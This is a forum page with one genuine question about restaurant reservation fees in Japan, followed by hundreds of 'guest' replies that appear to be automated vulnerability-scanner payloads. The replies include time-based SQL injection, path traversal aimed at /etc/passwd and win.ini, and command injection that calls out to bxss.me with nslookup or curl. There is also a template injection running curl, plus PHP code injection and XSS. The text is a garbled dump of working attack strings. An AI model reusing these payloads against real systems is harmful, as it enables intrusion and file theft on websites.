I remember seeing certain restaurants charging full amount when you make a reservation whereas others are charging 1000JPY.
re: guest
kTI7UB41
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+135-135-1=0+0+0+1
re: guest
-1 OR 3+135-135-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
tbTKlxcm'; waitfor delay '0:0:15' --
re: guest
-5 OR 913=(SELECT 913 FROM PG_SLEEP(15))--
re: guest
-5) OR 279=(SELECT 279 FROM PG_SLEEP(15))--
re: guest
-1)) OR 214=(SELECT 214 FROM PG_SLEEP(15))--
re: guest
WBzpG8BY' OR 873=(SELECT 873 FROM PG_SLEEP(15))--
re: guest
n9cYWFcK') OR 93=(SELECT 93 FROM PG_SLEEP(15))--
re: guest
ZtbLlKmu')) OR 45=(SELECT 45 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@lIkv6
re: guest
pAU0xMTy
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+166-166-1=0+0+0+1
re: guest
-1 OR 3+166-166-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
Hcs9A7uB'; waitfor delay '0:0:15' --
re: guest
-5 OR 512=(SELECT 512 FROM PG_SLEEP(15))--
re: guest
-5) OR 496=(SELECT 496 FROM PG_SLEEP(15))--
re: guest
-1)) OR 454=(SELECT 454 FROM PG_SLEEP(15))--
re: guest
7Z87XrOl' OR 565=(SELECT 565 FROM PG_SLEEP(15))--
re: guest
Ax96Dhwj') OR 335=(SELECT 335 FROM PG_SLEEP(15))--
re: guest
NZ2d8l4v')) OR 413=(SELECT 413 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@EK8GE
re: guest
1sTZv0m2O
re: guest
%0abcc:074625.67-12678.67.126f6.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-12679.67.126f6.19990.2@bxss.me
re: guest
response.write(9727041*9052049)
re: guest
'+response.write(9727041*9052049)+'
re: guest
"+response.write(9727041*9052049)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
${9999446+9999140}
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
)
re: guest
/etc/passwd
re: guest
echo lncxpi$()\ sebbzu\nz^xyu||a #' &echo lncxpi$()\ sebbzu\nz^xyu||a #|" &echo lncxpi$()\ sebbzu\nz^xyu||a #
re: guest
'.gethostbyname(lc('hitly'.'kkekqosgecb4a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(87).chr(108).chr(66).'
re: guest
!(()&&!|*|*|
re: guest
%2fetc%2fpasswd
re: guest
&echo qkaemm$()\ apuxim\nz^xyu||a #' &echo qkaemm$()\ apuxim\nz^xyu||a #|" &echo qkaemm$()\ apuxim\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
".gethostbyname(lc("hituo"."wgrfpttu56a7d.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(67).chr(103).chr(75)."
re: guest
^(#$!@#$)(()))******
re: guest
|echo szsbsy$()\ flxvop\nz^xyu||a #' |echo szsbsy$()\ flxvop\nz^xyu||a #|" |echo szsbsy$()\ flxvop\nz^xyu||a #
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
(nslookup hitylwjnspdpq674a1.bxss.me||perl -e "gethostbyname('hitylwjnspdpq674a1.bxss.me')")
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
$(nslookup hitypkaaibhigd919b.bxss.me||perl -e "gethostbyname('hitypkaaibhigd919b.bxss.me')")
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
&nslookup hitztnaeeqcbr3024e.bxss.me&'\"`0&nslookup hitztnaeeqcbr3024e.bxss.me&`'
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
&(nslookup hittnelgwurvg6abb3.bxss.me||perl -e "gethostbyname('hittnelgwurvg6abb3.bxss.me')")&'\"`0&(nslookup hittnelgwurvg6abb3.bxss.me||perl -e "gethostbyname('hittnelgwurvg6abb3.bxss.me')")&`'
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
|(nslookup hitgqpjeapvlg8658d.bxss.me||perl -e "gethostbyname('hitgqpjeapvlg8658d.bxss.me')")
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(104).concat(69).concat(120).concat(70)+(require"socket"
Socket.gethostbyname("hitwz"+"sqfnaxgt2e32f.bxss.me.")[3].to_s)+"
re: guest
file:///etc/passwd
re: guest
`(nslookup hithxtziycvczc915f.bxss.me||perl -e "gethostbyname('hithxtziycvczc915f.bxss.me')")`
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
bxss.me/t/xss.html?%00
re: guest
'+'A'.concat(70-3).concat(22*4).concat(120).concat(69).concat(118).concat(85)+(require'socket'
Socket.gethostbyname('hitwe'+'wmvikkrw48c45.bxss.me.')[3].to_s)+'
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
;(nslookup hitiwxvwrlyii3ad43.bxss.me||perl -e "gethostbyname('hitiwxvwrlyii3ad43.bxss.me')")|(nslookup hitiwxvwrlyii3ad43.bxss.me||perl -e "gethostbyname('hitiwxvwrlyii3ad43.bxss.me')")&(nslookup hitiwxvwrlyii3ad43.bxss.me||perl -e "gethostbyname('hitiwxvwrlyii3ad43.bxss.me')")
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
Http://bxss.me/t/fit.txt
re: guest
/WEB-INF/web.xml
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
/etc/shells
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
c:/windows/win.ini
re: guest
/../../../../../../../../../../boot.ini
re: guest
bxss.me
re: guest
'"
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
<!--
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
';print(md5(31337));$a='
re: guest
";print(md5(31337));$a="
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
${@print(md5(31337))}
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
${@print(md5(31337))}\
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
'.print(md5(31337)).'
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+978-978-1=0+0+0+1 --
re: guest
-1 OR 3+978-978-1=0+0+0+1 --
re: guest
-1 OR 2+482-482-1=0+0+0+1
re: guest
-1 OR 3+482-482-1=0+0+0+1
re: guest
-1' OR 2+90-90-1=0+0+0+1 --
re: guest
-1' OR 3+90-90-1=0+0+0+1 --
re: guest
-1' OR 2+55-55-1=0+0+0+1 or 'RX1VANZG'='
re: guest
-1' OR 3+55-55-1=0+0+0+1 or 'RX1VANZG'='
re: guest
-1" OR 2+793-793-1=0+0+0+1 --
re: guest
-1" OR 3+793-793-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
Haz4Je7k'; waitfor delay '0:0:15' --
re: guest
-5 OR 723=(SELECT 723 FROM PG_SLEEP(15))--
re: guest
-5) OR 851=(SELECT 851 FROM PG_SLEEP(15))--
re: guest
-1)) OR 231=(SELECT 231 FROM PG_SLEEP(15))--
re: guest
dt2M98Qi' OR 903=(SELECT 903 FROM PG_SLEEP(15))--
re: guest
8RSC49z7') OR 795=(SELECT 795 FROM PG_SLEEP(15))--
re: guest
7coLKXYE')) OR 568=(SELECT 568 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@EbVVx
re: guest
1
re: guest
1
re: guest
1
re: guest
1
re: guest
1
re: guest
1
re: guest
17H9GTDTP0
re: guest
response.write(9545891*9552781)
re: guest
'+response.write(9545891*9552781)+'
re: guest
"+response.write(9545891*9552781)+"
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
${9999067+9999909}
re: guest
file:///etc/passwd
re: guest
../
re: guest
redirtest.acx
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
'.gethostbyname(lc('hithw'.'cjcufoxtd2fc2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(85).chr(99).chr(82).'
re: guest
".gethostbyname(lc("hitbb"."ebzfiazkc4d2e.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(71).chr(112).chr(87)."
re: guest
gethostbyname(lc('hitnh'.'rmivhpvv004ca.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(70).chr(102).chr(80)
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
re: guest
/etc/shells
re: guest
echo tfszrb$()\ heepmt\nz^xyu||a #' &echo tfszrb$()\ heepmt\nz^xyu||a #|" &echo tfszrb$()\ heepmt\nz^xyu||a #
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
bxss.me/t/xss.html?%00
re: guest
&echo krjvez$()\ gcpvru\nz^xyu||a #' &echo krjvez$()\ gcpvru\nz^xyu||a #|" &echo krjvez$()\ gcpvru\nz^xyu||a #
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
c:/windows/win.ini
re: guest
|echo kfsttk$()\ adttvv\nz^xyu||a #' |echo kfsttk$()\ adttvv\nz^xyu||a #|" |echo kfsttk$()\ adttvv\nz^xyu||a #
re: guest
';print(md5(31337));$a='
re: guest
bxss.me
re: guest
"+"A".concat(70-3).concat(22*4).concat(112).concat(89).concat(109).concat(85)+(require"socket"
Socket.gethostbyname("hitwb"+"hlmmieby11af5.bxss.me.")[3].to_s)+"
re: guest
expr 9000318927 - 926156
re: guest
";print(md5(31337));$a="
re: guest
Http://bxss.me/t/fit.txt
re: guest
'+'A'.concat(70-3).concat(22*4).concat(119).concat(78).concat(118).concat(84)+(require'socket'
Socket.gethostbyname('hitqc'+'qjktljksf8f75.bxss.me.')[3].to_s)+'
re: guest
(nslookup -q=cname hitzvbnocmsww09fc3.bxss.me||curl hitzvbnocmsww09fc3.bxss.me))
re: guest
${@print(md5(31337))}
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
'A'.concat(70-3).concat(22*4).concat(102).concat(87).concat(104).concat(87)+(require'socket'
Socket.gethostbyname('hitld'+'hmgmdomgf9a07.bxss.me.')[3].to_s)
re: guest
$(nslookup -q=cname hittybpzyvuaf69659.bxss.me||curl hittybpzyvuaf69659.bxss.me)
re: guest
${@print(md5(31337))}\
re: guest
&nslookup -q=cname hitwtlngeusok82b76.bxss.me&'\"`0&nslookup -q=cname hitwtlngeusok82b76.bxss.me&`'
re: guest
'.print(md5(31337)).'
re: guest
'"()
re: guest
&(nslookup -q=cname hitawlkxbiulb64a5a.bxss.me||curl hitawlkxbiulb64a5a.bxss.me)&'\"`0&(nslookup -q=cname hitawlkxbiulb64a5a.bxss.me||curl hitawlkxbiulb64a5a.bxss.me)&`'
re: guest
replies
re: guest
'&&sleep(27*1000)*isoaze&&'
re: guest
|(nslookup -q=cname hitnjniaxtvpa22d2f.bxss.me||curl hitnjniaxtvpa22d2f.bxss.me)
re: guest
'"
re: guest
replies
re: guest
"&&sleep(27*1000)*ukpgcb&&"
re: guest
`(nslookup -q=cname hitouteeuxizm69634.bxss.me||curl hitouteeuxizm69634.bxss.me)`
re: guest
<!--
re: guest
replies/.
re: guest
'||sleep(27*1000)*nqtyom||'
re: guest
;(nslookup -q=cname hitqlmcdmrykb88822.bxss.me||curl hitqlmcdmrykb88822.bxss.me)|(nslookup -q=cname hitqlmcdmrykb88822.bxss.me||curl hitqlmcdmrykb88822.bxss.me)&(nslookup -q=cname hitqlmcdmrykb88822.bxss.me||curl hitqlmcdmrykb88822.bxss.me)
re: guest
"||sleep(27*1000)*nyhdgl||"
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hituxottuwwnu4deca.bxss.me||curl${IFS}hituxottuwwnu4deca.bxss.me)
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitrndvjjwzam5e13e.bxss.me||curl${IFS}hitrndvjjwzam5e13e.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitrndvjjwzam5e13e.bxss.me||curl${IFS}hitrndvjjwzam5e13e.bxss.me)&`'
re: guest
'"()&%<zzz><ScRiPt >u4em(9442)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitbzmhultaov27260.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >u4em(9297)</ScRiPt>
re: guest
9712685
re: guest
TFWDpZcr
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
EY5Tt9lU'; waitfor delay '0:0:15' --
re: guest
-1 OR 383=(SELECT 383 FROM PG_SLEEP(15))--
re: guest
-1) OR 44=(SELECT 44 FROM PG_SLEEP(15))--
re: guest
-1)) OR 359=(SELECT 359 FROM PG_SLEEP(15))--
re: guest
dVlyY7k1' OR 308=(SELECT 308 FROM PG_SLEEP(15))--
re: guest
z192LgtU') OR 431=(SELECT 431 FROM PG_SLEEP(15))--
re: guest
VUnrEmOp')) OR 714=(SELECT 714 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@uLN3E
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)